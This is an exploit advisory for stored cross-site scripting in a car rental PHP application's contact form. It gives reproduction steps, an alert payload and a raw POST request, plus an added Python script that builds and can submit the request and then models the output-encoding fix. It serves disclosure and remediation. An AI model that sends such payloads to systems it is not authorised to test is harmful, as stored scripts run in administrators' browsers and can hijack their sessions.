# Exploit Title: Car Rental Management System v1.0 - Persistent Cross-Site Scripting (Unauthenticated)  
# Exploit Author: Adeeb Shah (@hyd3sec)  
# Date: August 3, 2020  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4  
# Vulnerability Details  
# Description: A persistent (stored) cross-site scripting vulnerability exists in the 'message' parameter of the contact form served by message_admin.php.
# An unauthenticated user can submit JavaScript in this field; the input is stored without sanitisation and executes in the browser of any administrator who views the messages in the admin console.
1. Navigate to http://HOST/car-Rental-syatem-PHP-MYSQL-master/message_admin.php
2. In the message field enter <script>alert("XSS")</script>
3. Click Send Message
4. The next time an admin logs into the admin console and views the messages, the stored payload executes
POST /car-Rental-syatem-PHP-MYSQL-master/message_admin.php HTTP/1.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 77  
Connection: close  
Cookie: PHPSESSID=17icjb6fd26q9gm1ohj9c9ht5i  
Upgrade-Insecure-Requests: 1
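The raw request above is shown without its body. The following Python script is an added example written for this page; it is not part of the original advisory or of the Car Rental Management System code. It builds the same POST with the 'message' parameter and a correct Content-Length, can submit it to a target you are authorised to test, and contrasts a model of the vulnerable admin view with the output-encoding fix. Assumptions, not confirmed by the advisory: 'message' is the only form field the endpoint needs (the Content-Length of 77 in the captured request implies more bytes than that field alone accounts for, and those are not guessed here), and the admin page echoes the stored value into HTML verbatim.

```python
"""Added PoC builder and before/after rendering model for the stored XSS in
message_admin.php.  Not the advisory's or the application's own code.

Assumptions (not confirmed by the advisory):
  - the form field is named 'message' and is the only field needed;
  - the admin console inserts the stored value into HTML without encoding.
"""
import html
import urllib.parse
import urllib.request

# Path from the advisory; the spelling "syatem" is the application's own.
PATH = "/car-Rental-syatem-PHP-MYSQL-master/message_admin.php"
# Payload from step 2 of the advisory.
PAYLOAD = '<script>alert("XSS")</script>'


def build_poc_request(host: str, message: str, path: str = PATH) -> bytes:
    """Return the raw HTTP/1.1 POST that submits `message`.

    Content-Length is computed from the encoded body, so it stays correct
    for any payload.
    """
    body = urllib.parse.urlencode({"message": message}).encode()
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode() + body


def send_poc(host: str, message: str = PAYLOAD, path: str = PATH,
             scheme: str = "http") -> int:
    """Submit the payload to a live target and return the HTTP status.

    Only run this against a system you are authorised to test.  Not called
    by default so the script runs offline.
    """
    data = urllib.parse.urlencode({"message": message}).encode()
    req = urllib.request.Request(f"{scheme}://{host}{path}", data=data,
                                 method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def render_unsafe(stored_message: str) -> str:
    """Model of the vulnerable admin view (assumed): value dropped into the
    page exactly as stored, so a <script> tag in it becomes live markup."""
    return f'<div class="message">{stored_message}</div>'


def render_safe(stored_message: str) -> str:
    """The fix: HTML-encode on output.  html.escape(quote=True) is the
    Python equivalent of PHP's htmlspecialchars($msg, ENT_QUOTES)."""
    return f'<div class="message">{html.escape(stored_message, quote=True)}</div>'


def contains_live_script_tag(fragment: str) -> bool:
    """Crude marker used only to contrast the two renderings: does an
    unencoded <script tag survive in the fragment?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    print(build_poc_request("HOST", PAYLOAD).decode())
    print()
    for label, render in (("unsafe", render_unsafe), ("safe  ", render_safe)):
        out = render(PAYLOAD)
        print(f"{label}: {out}  live script tag: {contains_live_script_tag(out)}")
```

Run it as-is to print the request and the two renderings; call send_poc("HOST") from a shell to actually submit the payload. Encoding on output (or, in PHP, htmlspecialchars at the point the admin page prints the message) is what removes the vulnerability; rejecting the literal string "<script>" on input would not, since event-handler attributes and other vectors bypass such filters.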